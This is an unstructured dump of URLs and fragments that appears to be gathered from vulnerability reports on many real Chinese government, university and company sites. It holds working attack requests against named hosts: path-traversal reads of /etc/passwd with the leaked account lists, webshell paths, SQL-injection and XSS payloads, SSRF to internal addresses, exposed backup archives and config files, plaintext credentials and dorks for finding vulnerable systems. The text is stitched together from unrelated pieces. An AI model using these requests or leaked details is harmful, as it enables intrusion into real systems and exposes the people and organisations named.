http://218.25.119.234:8888/oa/index.asp这事网址 http://61.183.149.138/ http://pic4.semir.com/admin/index.aspx http://www.yichemall.com/order 
http://case.nau.edu.cn/newsView2.php?id=29 http://target/asp/fljs/list.asp?ParentID= svn://211.103.171.52/www/service svn://211.103.171.52/www/frontend svn://211.103.171.52/www/backend http://bjgcxx.baoji.gov.cn/xmxinxi_list1.php?tid=532&sid=8 http://pan.baidu.com/s/1hqtefMO https://github.com/wuchaofan/staticserver/blob/993c3e8e11891bb5276bb6af86e4b5a36e287345/staticserver.py http://106.186.30.236:8003/ http://106.186.30.236:8000/ http://106.186.30.236:8080/ http://manager.17chang.com/ http://ftp.17chang.com/ inurl:ws2004 http://www.sdwhys.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.sgtjb.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.fzjcxx.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.wuai.lwedu.sh.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.yzsx.net.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.sndsx.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.yygy.net/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://webim.91.com:80/.svn/entries http://extra.lenovo.com.cn/login.php http://58.213.19.68/rails_admin/main http://localhost//phpok/admin.php?c=update&f=unzip http://ningbo.19lou.com/vote/html/11676-result.html?73 display:none http://localhost/phpok/admin.php?c=admin&f=save http://wdcwx.wanda.cn/ http://wdcwx.wanda.cn/statics/ http://wdcwx.wanda.cn/reg.html http://wdcwx.wanda.cn/service/user.ashx?t=reg&name=1&mobile=13909090909&code=&tjname=&tjdate=&openid=&_=1421239446740 http://www.ddhong.com/tempUpload.action http://www.jinwei.com.cn/news/news.asp?id=1 http://www.jinwei.com.cn/logins.asp http://mailarchive.263.net/user.action http://121.14.133.17/福建电信,Resin文件读取 http://121.14.133.17/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://125.88.10.244/iCloud/ http://58.53.197.139/index.action http://58.53.197.139/k8cmd.jsp http://221.226.53.76:9080/sti/login.do 
http://seeyou.seecom.com.cn/sysadmin/login.aspx http://seeyou.seecom.com.cn/uploadfiles/images/2014/12/20141203075614478.asp http://www1.nuc.edu.cn/hqfw/listyq.php?classid=3 http://wa.cig.com.cn/ http://www.imac.edu.cn:80/yb/main.asp?id=248 http://www.imac.edu.cn:80/yyrw/index.asp?id=468 http://218.94.128.133/zl http://bbs.hiwifi.com http://bbs.hiwifi.com/home.php?mod=space&uid=109048&do=profile http://shjz.lfmz.gov.cn/ http://www.zzrc.cn/index/personal/previewResume.do?resumeId=4ae679cd4add76fb014ae267d3390137&flag=1 http://exam.nyist.net/admin/files/*******.xls http://www.webrebuild.org/ http://www.szjrwl.com/ inurl:product.asp?class= http://www.spdl68.com/newshow.asp?id=19&mnid=6364&classname=%D0%C2%CE%C5%B6%AF%CC%AC&uppage=/news.asp http://www.cdpi.cn/ http://www.hzwanda.cn http://www.njpf.gov.cn/njpf.rar www.jsrcgz.gov.cn/jsrcgz.rar http://www.nmgmg.gov.cn/nmgmg.gov.cn.rar http://**.**.**/ http://www.cregc.com.cn/read.asp?id=2062 http://www.365pp.com/Order/Submit/Index?sku=10138201 www.365pp.com http://oa.gaosiedu.com/wui/theme/ecology7/page/login.jsp?templateId=1 http://oa.gaosiedu.com/wui/theme/ecology7/page/login.jsp?templateId=1 http://oa.gaosiedu.com/wui/theme/ecology7/page/login.jsp?templateId=1 https://59.151.102.5/ http://221.179.175.72:4440/ http://221.179.175.72:4440/menu/home http://221.179.175.72:4440/project/test1/command/run https://222.92.15.100/base/login/login.php http://test.bescar.com/base/login/login.php http://222.223.56.116/base/login/login.php https://222.92.15.100/base/login/get http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-023234 http://111.206.74.123:8090/script http://www.lieyou.com/ URL:http://www.chuguo.cn/album/detail.aspx?id=5315 IP:219.148.37.169 http://cvs.hexun.com/zhaopin/default.aspx?area=&posttype=%CA%B5%CF%B0%C0%E0 www.homeway.net.cn http://stockdata.stock.hexun.c… http://oa.tcl.com/weaver/weaver.email.FileDownloadLocation?fileid=39&do http://www.sqlmap.org 
http://www.chinafoodsltd.com:8080/IR_E/notice.jsp?ClassID=2015 http://www.sqlmap.org www.chinaf http://data.bank.hexun.com/card/xykcs/csdb.aspx?db=pro208 http://www.sqlmap.org http://www.oppodigital.com.cn/club_register.php?act=check_username&user http://www.sqlmap.org www.oppodi http://www.oppodigital.com.cn/club_get_password.php http://topic.xcar.com.cn/201107/jlys/list.php?iscar=1&count=21&per=8&cu http://www.sqlmap.org http://www.oppobd.com/club_register.php?act=check_username&username= http://www.sqlmap.org www.oppobd http://www.oppodigital.com.cn/club_register.php http://note.youdao.com/memory/?url=http://www.wooyun.org(如需登录,请注册登录) http://note.youdao.com http://127.0.0.1 intitle:trs+inurl:inforadar inurl:jsp/portalsearch inurl:inforadar http://search.cmbchina.com/cmb/jsp/xml/init_sysUsers.xml http://inforadar.trs.com.cn/jsp/xml/init_sysUsers.xml http://oa.fjnet.com:6789/inforadar/jsp/xml/init_sysUsers.xml http://219.130.221.60:8080/inforadar/jsp/xml/init_sysUsers.xml http://114.255.93.220/inforadar/jsp/xml/init_sysUsers.xml http://113.108.133.173/inforadar/jsp/xml/init_sysUsers.xml http://124.172.237.105/inforadar/jsp/xml/init_sysUsers.xml http://oa.fjnet.com:6789/inforadar/jsp/xml/init_sysUsers.xml http://219.130.221.60:8080/inforadar/jsp/xml/init_sysUsers.xml http://114.255.93.220/inforadar/jsp/xml/init_sysUsers.xml http://114.255.93.220/inforadar/admin_Log_List.do?type=3 http://113.108.133.173/inforadar/jsp/xml/init_sysUsers.xml http://113.108.133.173/inforadar/admin_Log_List.do?type=3 http://124.172.237.105/inforadar/jsp/xml/init_sysUsers.xml www2.easou.com addr:120.197.93.208 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.208 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:118.145.13.20 Bcast:118.145.13.63 Mask:255.255.255.192 addr:10.21.13.20 Bcast:10.21.15.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:118.145.13.22 Mask:255.255.255.255 addr:118.145.13.17 Bcast:118.145.13.63 Mask:255.255.255.192 
addr:10.21.13.17 Bcast:10.21.15.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:118.145.13.22 Mask:255.255.255.255 addr:120.197.93.207 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.207 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:120.197.93.209 Mask:255.255.255.255 addr:120.197.93.206 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.206 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:120.197.93.209 Mask:255.255.255.255 addr:120.197.93.205 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.205 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:120.197.93.209 Mask:255.255.255.255 addr:120.197.93.213 Mask:255.255.255.255 http://e.ciwong.com/course http://www.pzhfzjz.gov.cn/zwgk_SGcontent.asp?key=2 http://tongji.tarena.com.cn/upload.action http://multimedia.tcl.com/WEB-INF/web.xml http://multimedia.tcl.com/WEB-INF/classes/applicationContext.xml http://multimedia.tcl.com/WEB-INF/classes/hibernate.cfg.xml jdbc:mysql://10.120.99.19/multimedia?useServerPrepStmts=false&useUnicode=true&characterEncoding=UTF-8&logger=com.mysql.jdbc.log.StandardLogger http://www.55.la/ http://www.55.la/run/user/ajax_loginuser.php http://admin.edm.wanmei.com/ http://new.netecweb.com/back/login.aspx http://new.netecweb.com/back/contect/Disp.aspx?id=1 http://m.baidu.com/from=2001a/pu=sz%401320_480/s?word=xss%E4%BB%A3%E7%A0%81++img&sa=tb&ts=8009202&t_kt=0 http://ued.suning.com/survey/admin/ http://ued.suning.com/survey/admin/?c=account&a=login&rd=Ij48c3ZnIG9ubG9hZD1hbGVydCgxKT48Ig== http://www.dfss-club.com/class/class.jsp?id=16 http://www.dfss-club.com/admin/index.jsp http://www.dfss-club.com/admin/MyJspkja452asdfdfdsldfijkl.jsp http://www.dfss-club.com/img/main.jsp ecard.lzcc.edu.cn/selfsearch/Index_main.aspx?NewsClassCode=2 http://www.sqlmap.org https://61.183.228.66/ https://61.183.228.74/ https://61.183.228.86/ https://61.183.228.110/ https://61.183.228.82/ https://61.183.228.98/ 
https://61.183.228.70/ https://61.183.228.94/ https://61.183.228.102/ https://61.183.228.78/ https://61.183.228.110 http://60.211.216.19:8080/ras/view/queryName.jsp http://www.mailer.com.cn/demo/ http://mail.mailer.cn/ http://**.**.**/upload1/UploadTemp/ user:liqiang pass:liqiang addr:211.71.69.188 Bcast:211.71.69.255 Mask:255.255.255.0 addr:192.168.2.230 Bcast:192.168.2.255 Mask:255.255.255.0 addr:127.0.0.1 Mask:255.0.0.0 addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 http://www.dmfh.org.cn/newshow.php?id=238 http://ct.ifeng.com/auth/index http://weather.ganhuoche.com/api/getprovince/ http://weather.ganhuoche.com/api/getprovince/?area=* http://qing.blog.sina.com.cn/blog/controllers/share.php?url=10.210.75.3 http://qing.blog.sina.com.cn/blog/controllers/share.php?url=127.0.0.1 http://qing.blog.sina.com.cn/blog/controllers/share.php?url=127.0.0.1/in2xse231.lmht http://m.coolyun.com:9000/main http://www.taga.gov.cn/1.rar http://www.zjszx.gov.cn/sql.rar http://www.ahpfpc.gov.cn/1.rar http://www.gxdzzl.gov.cn/gxdzzl.rar http://www.wfdpc.gov.cn/wwwroot.rar http://game.g.pptv.com/guest/c/sq/api.php?action=logout发现这是个PPTV的游戏登陆的一个页面,也没有https加密和验证码机制 http://homepage.swjtu.edu.cn/Home/List.aspx?type=search&truename=%%27 http://www.shiyuesoft.com/cases/case.html inurl:detail.html http://110.86.15.246/ http://www.ikanggroup.com/cn/pc/index.html http://shop.healthyd.com/m/Medifast.html) http://shop.healthyd.com/ http://shopadmin.healthyd.com http://www.wooyun.org/bugs/wooyun-2015-091845/trace/0e184aac8bde91257f9c2e657e33692f http://test.52xinyou.cn/这个地址是信游科技提供的专门的测试漏洞的子站 com:8080/../../../../../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:104:109::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin snmp:x:103:106::/var/lib/snmp:/bin/false yuwanfu:x:1001:1003::/home/yuwanfu:/bin/bash wuhaiting:x:1012:1014::/home/wuhaiting:/bin/bash user_00:x:1019:1021::/home/user_00:/bin/bash dspeak:x:1020:1022::/home/dspeak:/usr/sbin/nologin xiaoshengwen:x:2592:2592::/home/xiaoshengwen:/bin/bash sunjianpeng:x:2605:2605::/home/sunjianpeng:/bin/bash liumeijun:x:2659:2659::/home/liumeijun:/bin/bash lijie1:x:2744:2744::/home/lijie1:/bin/bash liangguanhui:x:2063:2063::/home/liangguanhui:/bin/bash liuyixing:x:2832:2832::/home/liuyixing:/bin/bash zenglei:x:2723:2723::/home/zenglei:/bin/bash zhoumingliang:x:2735:2735::/home/zhoumingliang:/bin/bash linxiaohu:x:2083:2083::/home/linxiaohu:/bin/bash liushoukai:x:2902:2902::/home/liushoukai:/bin/bash com:8080/../../../../../../../../../../../../../../../../../etc/hosts http://59.50.113.197:1680/suntek_eap_info_file_dir/attach/public/2.jsp http://c.hexun.com/ajax_StockUserDelegate.aspx?StockCode=000002';waitfor http://futures.ecitic.com/openfile.php?id=59&tfile=../../../../../../../../../../etc/passwd&turl=download root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin citic:x:500:500:citic:/home/citic:/bin/bash mysql:x:100:101:MySQL server:/usr/local/mysql:/bin/bash pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin mircte:x:0:501::/home/mircte:/bin/bash clamav:x:501:502:Clam Antivirus:/home/clamav:/bin/false http://www.wfswl.gov.cn/a.zip http://www.hurf.gov.cn/database.rar http://www.tlepb.gov.cn/wwwroot.rar http://www.xygtj.gov.cn/wwwroot.rar http://www.systats.gov.cn/root.zip http://www.yzqxj.com/showtext.asp?id=14220 http://58.56.6.28:8000/ http://admin.meizu.com/web.rar http://i.g-fox.cn/i.g-fox.cn.zip http://115.182.3.194/code.tar.gz http://183.129.160.94/minshen/minshen.rar http://xyk.jlu.edu.cn/managerNManager.action http://117.79.150.240/../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin www:x:501:501::/home/www:/sbin/nologin zabbix:x:496:492:Zabbix System:/var/lib/zabbix:/sbin/nologin liaowb:x:502:502::/home/liaowb:/bin/bash zhangsy:x:503:503::/home/zhangsy:/bin/bash zhutao:x:504:504::/home/zhutao:/bin/bash mongod:x:495:491:mongod:/var/lib/mongo:/bin/false apache:x:48:48:Apache:/var/www:/sbin/nologin ganglia:x:494:490:Ganglia System:/var/lib/ganglia:/sbin/nologin zabbixsrv:x:493:489:Zabbix server:/var/lib/zabbixsrv:/sbin/nologin nginx:x:492:488:Nginx server:/var/lib/nginx:/sbin/nologin jiayq:x:505:505::/home/jiayq:/bin/bash chenglu:x:506:506::/home/chenglu:/bin/bash yagnjm:x:507:507::/home/yagnjm:/bin/bash yangjm:x:508:508::/home/yangjm:/bin/bash http://117.79.150.240/../../../../../../../../../../../../../etc/hosts http://feed.36kr.com/../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin polkituser:x:87:87:PolicyKit:/:/sbin/nologin avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin alan:x:500:500::/home/alan:/bin/bash andy:x:501:501::/home/andy:/bin/bash ian:x:502:502::/home/ian:/bin/bash mediafed:x:503:503::/home/mediafed:/bin/bash mysql:x:498:497:MySQL server:/var/lib/mysql:/bin/bash mediafedsvn:x:504:504::/home/mediafedsvn:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin haproxy:x:497:496:HAProxy user:/var/lib/haproxy:/bin/false xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:496:495:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin nagios:x:495:494::/var/spool/nagios:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nrpe:x:494:493:NRPE service:/:/sbin/nologin ec2-user:x:222:505:EC2 User:/home/ec2-user:/bin/bash sshTunnel:x:505:507::/home/sshTunnel:/bin/bash memcached:x:221:492:Memcached 
daemon:/var/run/memcached:/sbin/nologin saslauth:x:220:76:"Saslauthd saslauth:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin http://wooyun.org/bugs/wooyun-2014-085445 http://bbs.dichan.com/tie-1412-1.html http://bbs.dichan.com/tie-2111364-4.html ww.tl/_- ww.tl/_- http://auth.ext.jumei.com/可爆破 http://oa.bjjgsj.com//C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmai http://www.sqlmap.org http://60.173.215.11/wcm/ http://60.173.215.11/wcm/services/trs:templateservicefacade?wsdl http://110.167.201.102/ Example:http://wap.sogou.com/transcoding/sweb/detail.jsp?sid=11111111&r=1&auto=11111&g_ut=2&url=http://www.qq.com/ http://img.store.sogou.com/net/a/08/link?appid=100520033&url=http%3A%2F%2Fimg1.gtimg.com%2Fnews%2Fpics%2Fhv1%2F16%2F44%2F1776%2F115495636.jpg&referer=http%3A%2F%2Fwww.qq.com%2F http://img.store.sogou.com/net/a/08/link?appid=100520033&url=http://10.12.139.10/favicon.ico http://www.zhengzh.12306.cn/Dzsw/Shky/hwky.wai/com/images/banner.jsp http://60.29.175.24/zytg/sys/Login_dologin.action http://pm.sh13mcc.cn:8888/shssy/sys/Login_dologin.action http://117.32.132.37:8080/slsdjt/sys/Login_dologin.action http://pm.crbcint.com/lqcms/sys/Login_dologin.action http://www.racing-china.com/news_list.aspx?Search=s http://mail.sina.com.cn/register/reg_vipmail.php?uid= http://mail.sina.com.cn/register/reg_vipmail.php?uid=%22%3E http://www.huxiu.com/user/reset_passwdo?resetpasswd=f381654aec54e880bd0c41bc15915d89 http://www.czxx.gov.cn http://www.czxx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/default.aspx http://www.czxx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemState/default.aspx http://www.czxx.gov.cn//fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemErrorLog/default.aspx http://www.czxx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://study.zjwst.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ 
http://www.dzjy.net.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://dn.gzgb.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://www.bzdyjy.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://dy.gzgb.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://www.rdgx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig http://www.asgj.net/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig http://c.miaozhen.atm.youku.com/../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin 
rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash redis:x:101:157:Redis Server:/var/lib/redis:/sbin/nologin lighttpd:x:102:158:lighttpd server:/var/www/lighttpd:/sbin/nologin youkuadmin:x:500:500::/home/youkuadmin:/bin/bash http://www.tbqjx.com/news-page.php?id=2 inurl:erji.aspx?id= http://222.135.109.70:8100/erji.aspx?id=268&deptid=0 http://61.133.119.187:8089/erji.aspx?id=268&deptid=0 http://221.2.149.47:8100/erji.aspx?id=268&deptid=0 http://222.135.76.147:8100/erji.aspx?id=268&deptid=0 http://60.217.72.17:8073/erji.aspx?id=268&deptid=0 http://221.2.171.59:8000/erji.aspx?id=268&deptid=0 inurl:economyview.aspx?id= http://222.135.109.70:8100/economylist.aspx?deptid=54&id=279 http://61.133.119.187:8089/economylist.aspx?deptid=52&id=220 http://222.135.127.190:7000/economylist.aspx?deptid=&id=245 http://221.2.171.59:8000/economylist.aspx?deptid=52&id=267 http://60.217.72.17:8000/economylist.aspx?deptid=48&id=220 http://61.133.119.187:8089/economyview.aspx?id=220&newsid=1735&deptid=51 http://222.135.127.190:7000/economyview.aspx?id=268&newsid=1696&deptid=55 http://221.2.171.59:8000/economyview.aspx?id=220&newsid=2086&deptid=52 http://60.217.72.17:8000/economyview.aspx?id=220&newsid=2092&deptid=48 http://222.135.109.70:8100/economyview.aspx?id=245&newsid=2340&deptid=54 http://www.dfsszc.com/Message.aspx?m=20131120105221290656 http://home.ciwong.com/ http://ip.xh.sh.cn/xhkj/user/login!login.do http://auto.smartisan.com/etc/my.cnf http://auto.smartisan.com/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync 
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin azureuser:x:500:500::/home/azureuser:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin mongod:x:498:498:mongod:/var/lib/mongo:/bin/false http://wsxf.agri.gov.cn/bzxx.htm http://iphone.wochacha.com/personcenter/info?page=1&city_id=1&udid=854882cbf4835a9eb81f5cd49e714a43********&openid=854882cbf4835a9eb81f5********44cd6&v=7.0.2&source=iphone&connectnet=wifi&os=iphone http://iphone.wochacha.com/personcenter/info?page=1&city_id=1&udid=854882cbf4835a9eb81f5cd49e714a43********&openid=854882cbf4835a9eb81f5********44cd6&v=7.0.2&source=iphone&connectnet=wifi&os=iphone http://chat.xcar.com.cn/blog/guestbook.php?page=1 http://www.easytransfer.cn:8003,可惜未爆破 http://www.easytransfer.cn:8004 http://101.227.68.194:8099/login.aspx admin:admin http://211.157.15.200/index.php root:x:0:0:root:/root:/usr/local/bash_4.1/bin/bash 